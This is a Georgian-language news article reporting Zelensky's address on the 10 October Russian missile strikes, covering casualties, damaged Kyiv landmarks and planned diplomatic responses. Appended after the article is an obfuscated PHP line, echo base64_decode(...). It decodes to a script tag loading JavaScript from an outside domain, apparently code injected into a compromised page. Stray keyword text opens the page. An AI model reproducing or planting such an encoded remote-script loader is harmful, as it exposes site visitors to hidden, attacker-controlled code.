celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი აცხადებს, რომ 10 ოქტომბერს რუსეთის ტერორისტული თავდასხმის შედეგად დაიღუპა 12 ადამიანი, 80-ზე მეტი კი დაშავდა. უკრაინის ლიდერის ცნობით, რუსეთის სარაკეტო იერიშების შემდეგ მთელ ქვეყანაში აღდგენითი სამუშაოები გრძელდება. ამის შესახებ ზელენსკიმ ყოველდღიურ მიმართვაში განაცხადა. მისი თქმით, მან შესაბამის სახელმწიფო სტრუქტურებს დაავალა, რომ აღდგენის პროცესი მაქსიმალურად სწრაფი იყოს. ასევე გრძელდება სამუშოები დაბომბილ ქალაქებში ელექტროენერგიის მიწოდების აღსადგენად.
 
„რუსი ტერორისტების დარტყმების მიერ დღეს დაზიანებულ ყველა ობიექტს აღვადგენთ. ეს მხოლოდ დროის საკითხია“, – განაცხადა ზელენსკიმ.
 
უკრაინის პრეზიდენტმა ასევე ხაზგასმით აღნიშნა, რომ უკრაინის საჰაერო თავდაცვის სისტემამ რუსული რაკეტების გარდა, გაანადგურა ირანული წარმოების უპილოტო საფრენი აპარატები. მან ასევე მადლობა გადაუხადა უკრაინის საჰაერო ძალებს და სახმელეთო ჯარების დანაყოფებს, რომლებმაც რუსეთის მიერ 84 გაშვებული რაკეტიდან 43 ჩამოაგდეს და 24 დრონიდან 13 გაანადგურეს.
 
„ტერორისტების ხელმძღვანელები ამბობენ, თითქოს ყველა დაგეგმილ სამიზნეს მიაღწიეს. ისინი იტყუებიან როგორც ყოველთვის. შეხედეთ მათ რეალურ სამიზნეებს, ენერგეტიკის ობიექტების გარდა. მხოლოდ ჩვენი დედაქალაქის მაგალითი აიღეთ. კიევში გზაჯვარედინი, სადაც ახლა ვდგავარ, ვლადიმირსკის ქუჩისა და შევჩენკოს ბულვარის გზაჯვარედინი. აი ასეთია სამიზნე. აქედან შვიდას მეტრში წმინდა სოფიას ტაძრის სამრეკლოა. მოსკოვი ჯერ არ არსებობდა, როდესაც ის უკვე იდგა. ცოტა მოშორებით – ვლადიმირ გორაკია, ადგილია, რომელიც ევროპის აღმოსავლეთისთვის ქრისტიანობისა და კულტურის წყარო გახდა, კერძოდ, იმ ტერიტორიისთვის, რომელსაც ბევრად მოგვიანებით რუსეთი ეწოდა. ჩემს გვერდით – შევჩენკოს უნივერსიტეტის კორპუსებია, რომელსაც მალე 190 წელი შეუსრულდება. ისინი ახლა დაზიანდა რუსეთის დარტყმის შედეგად. თუმცა ჩვენ ყველაფერს აღვადგენთ. ქალაქის მასწავლებლის სახლიც დაზიანდა. თავის დროზე იქ მუშაობდა უკრაინის ცენტრალური საბჭო და ეს ადგილი ყოველთვის იქნება უკრაინელებისთვის ჩვენი სახელმწიფოს შექმნის დიდებული ისტორიის ხსოვნის ადგილი. და პირდაპირ ჩემს უკან – შევჩენკოს პარკის საბავშვო მოედანია, რომელიც ასევე გახდა რუსული რაკეტის სამიზნე. ის უბრალოდ შევჩენკოს პარკში არ არის. ის მდებარეობს კიევის მუზეუმების ქუჩაზე. კერძოდ, ტერორისტების ამ დარტყმის შედეგად დაზიანდა ხანენკოს სახელობის ხელოვნების მუზეუმი. ასეა ჩვენი სახელმწიფოს ყველა ქალაქში – სამოქალაქო, კულტურული, საგანმანათლებლო ობიექტები“, – განაცხადა ზელენსკიმ.
 
უკრაინის პრეზიდენტის თქმით, რუსეთს სურს, უკრაინა მე-18 საუკუნეში დააბრუნოს, თუმცა უკრაინა მაინც დარჩება 21-ე საუკუნეში. როგორც ზელენსკიმ აღნიშნა, კიევი გადაიტანს ტერორისტების ამ შემოსევასაც, რომლებსაც არ აქვთ ისტორია, ტრადიცია და კულტურა.
 
„უკრაინის დაშინება შეუძლებელია. მხოლოდ უფრო მეტად გაერთიანებაა შესაძლებელი. უკრაინის შეჩერება შეუძლებელია. შესაძლებელია მხოლოდ უფრო მეტად დარწმუნება, რომ საჭიროა ტერორისტების გაუვნებელყოფა. რუსეთის არმიამ სპეციალურად განახორციელა ეს დარტყმები სწორედ დილის პიკის საათში. ეს ტერორისტების დამახასიათებელი ტაქტიკაა. მათ სურდათ, მეტი შიში გამოეწვიათ და მეტად დაეზარალებინათ ხალხი. მათ მთელი მსოფლიო შეძრეს“, – განაცხადა ზელენსკიმ.
 
ზელენსკის თქმით, უკრაინა გრძნობს, რომ მსოფლიო მის გვერდითაა. ამასთან, მისი ცნობით, 11 ოქტომბერს დაგეგმილია „დიდი შვიდეულის“ საგანგებო სხდომა. ასევე უკრაინა მუშაობს გაერო-ს გენერალურ ასამბლეაში რეზოლუციის წარსადგენად, რომელიც გმობს რუსეთის ქმედებებსა და ტერორს.
462
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");